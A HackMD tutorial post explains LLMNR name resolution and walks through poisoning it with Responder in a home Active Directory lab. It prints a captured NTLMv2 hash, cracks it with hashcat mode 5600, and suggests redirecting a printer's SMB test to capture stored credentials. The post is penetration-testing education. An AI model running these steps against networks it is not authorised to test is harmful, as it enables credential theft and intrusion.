Try   HackMD

LLMNR / NBT-NS Poisoning

tags: AD ActiveDirectory Responder hashcat LLMNR Poisoning

In this post we are gonna learn an overview of LLMNR / NBT-NS Poisoning, how to capture NLTMv2 hashes and how to crack them with hashcat.

What is LLMNR?

The first to clarify is that link local multicast name resolution is not a substitute for DNS. While it’s true that both technologies are designed to provide name resolution services, link local multicast name resolution is much more limited in scope than DNS is.

Knowing how works DNS, here the same thing happens. The DNS server checks to see if it has a record for the host, and if not it forwards the request to another DNS server. This could potentially keep happening until the request reaches the DNS server that is authoritative for the requested host's domain.

With this in mind, let’s turn our attention to link local multicast name resolution. The biggest limitation with link local multicast name resolution is that it is not routable. The name resolution process can only be used for computers that share a common subnet. Computers across a router are inaccessible to the name resolution process.

The reason why Microsoft chose to make link local multicast name resolution non-routable is because of the sheer number of hosts on the Internet. Link local multicast name resolution doesn't even have a name resolution database to fall back on. Instead, computers on the subnet broadcast their host names.

DNS is still the preferred name resolution method for Windows Vista and for Longhorn Server. Both of these operating systems are designed so that they will attempt to use DNS name resolution first. Link local multicast name resolution will only be used once the computer determines that it can not resolve the name using DNS.

How LLMNR works?

Typically, the name resolution process begins when a computer needs to communicate with another host on the network. This computer needs to resolve the remote host's name to an IP address. It therefore checks its TCP/IP configuration to get the IP address of a DNS server.

At this point, several different things could potentially happen. One possibility is that the computer contacts the DNS server and the DNS server resolves the name. Since my goal in writing this is to illustrate how link local multicast name resolution works, we will assume that DNS name resolution fails.

Now with DNS name resolution has failed, the computer will send a multicast name query out using the UDP protocol. All of the other devices on the network will receive the query. Assuming that these computers are running Windows Vista or Longhorn Server (with LLMNR enabled), they will compare the query to their own host name. Assuming that the requested host is not prohibited from responding to link local multicast name resolution queries, the computer will send a unicast message to the computer that sent the query. This message will contain the host's IP address.

Link Local Multicast Name Resolution also supports reverse mapping queries. This means that a host can send a query to a specific IP address and request that the host at that address responds with its computer name.

How to LLMNR / NBT-NS Poisoning

LLMNR attack is commonly used by Penetration testers during an engagement to get their hands on NTLMv2 hash.

The captured hash is either used to obtain the original password or used in the pass the hash attack.

The first to start with this attack is install responder.py ,in kali you can install it only with a command:

sudo apt install responder -y

If you are in other distro you can do a git clone to the repo:

git clone https://github.com/lgandx/Responder.git /opt/Responder

Now we look our interface name with ifconfig or ip a.

in my case the command will be like this:

sudo responder -I eth0 -v

Now try to access a non existing shared drive called "hackme" with the responder active:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Now solicites a user and a password, when the user enter something in the form and enter it we receive the hash of the password.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Save the captured hash into a file:

echo Administrador::ALPHA:b35d211aa2482bc1:C729C89691E0FE010E04494EF4C5C7A6:010100000000000000BFF595A620D8018BA56AD609360251000000000200080051004F003200300001001E00570049004E002D00420057004B005600500045003700480039004F00300004003400570049004E002D00420057004B005600500045003700480039004F0030002E0051004F00320030002E004C004F00430041004C000300140051004F00320030002E004C004F00430041004C000500140051004F00320030002E004C004F00430041004C000700080000BFF595A620D80106000400020000000800300030000000000000000000000000300000E26D9FC2CC4818953E6ACF3B6CD11971FC0F8A8BCB6D504244F41CC5997A68210A001000000000000000000000000000000000000900200063006900660073002F003100390032002E003100360038002E0031002E003400000000000000000000000000 > hashntlm

If you have a new installation of Kali you need to unzip the rockyou wordlist. It is at /usr/share/wordlist directory.




cd /usr/share/wordlist

sudo gunzip rockyou.txt.gz

In my case i know the password because is my AD lab so i make a short password list that contains the password used because i don't want spend hours cracking the password which i already know.

I recommend to run hashcat on the guest operating system because might not work if you are running Kali as a virtual machine.

The command to crack it with hashcat is:

hashcat -m 5600 hashntlm dictionary --force

Hashcat use a list of modes to select which type of hash you are gonna crack and this is configured with the -m flag and a number that you can find in this web. Next go the file with the hash and the file with the dictionary and force flag to ignore warnings.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Conclusions

Now you can use this on a pentest, and if you find default credentials in things like a printer or other device that has configuration capabilities and it allow to store credentials, it has an SMB share that you can't see the username and password but sometimes allow us to send to a server or a computer the file and maybe has the test button to test the SMB share and you can put the IP of your computer instead of the computer it's set to and now the credentials for that SMB share go to you, and this is cool because a lot of times people don't use lease privilege and those SMB shares have escalated privileges credentials.

Requisites for the conclusion.

  • Printer or other device that has configuration capabilities.
  • The device allow to store credentials and it has and SMB share.
  • The possibility to change the IP of the test button SMB.
Last changed by 
Mecanico
I am a cybersecurity enthusiast documenting his path in pentesting and infosec.
0
515

Read more

HackTheBox - Sauna Writeup

:computer: Port Scanning # Nmap 7.92 scan initiated Thu Aug 25 18:16:41 2022 as: nmap -sV -T4 -sT -sC -v -oN nmap 10.10.10.175 Nmap scan report for 10.10.10.175 Host is up (0.066s latency). Not shown: 990 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods:

Sep 1, 2022
HackTheBox - Forest Writeup

:computer: Port Scanning # Nmap 7.92 scan initiated Sun Aug 14 11:58:06 2022 as: nmap -sV -T4 -sS -sC -v -oN nmap 10.10.10.161 Nmap scan report for forest.htb (10.10.10.161) Host is up (0.12s latency). Not shown: 989 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-14 16:05:06Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn

Aug 26, 2022
HackTheBox - Friendzone Writeup

:computer: Port Scanning # Nmap 7.92 scan initiated Mon Aug 8 06:53:23 2022 as: nmap -sV -T4 -sT -sC -v -oN nmap 10.10.10.123 Nmap scan report for 10.10.10.123 Host is up (0.041s latency). Not shown: 993 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)

Aug 14, 2022
HackTheBox - Poison Writeup

:computer: Port Scanning # Nmap 7.92 scan initiated Fri Jun 10 07:21:26 2022 as: nmap -sV -T4 -sS -v -sC -p- -Pn -oN ports3 10.10.10.84 Nmap scan report for 10.10.10.84 Host is up (0.042s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0) | ssh-hostkey: | 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA) | 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)

Jun 12, 2022
Read more from Mecanico
Published on HackMD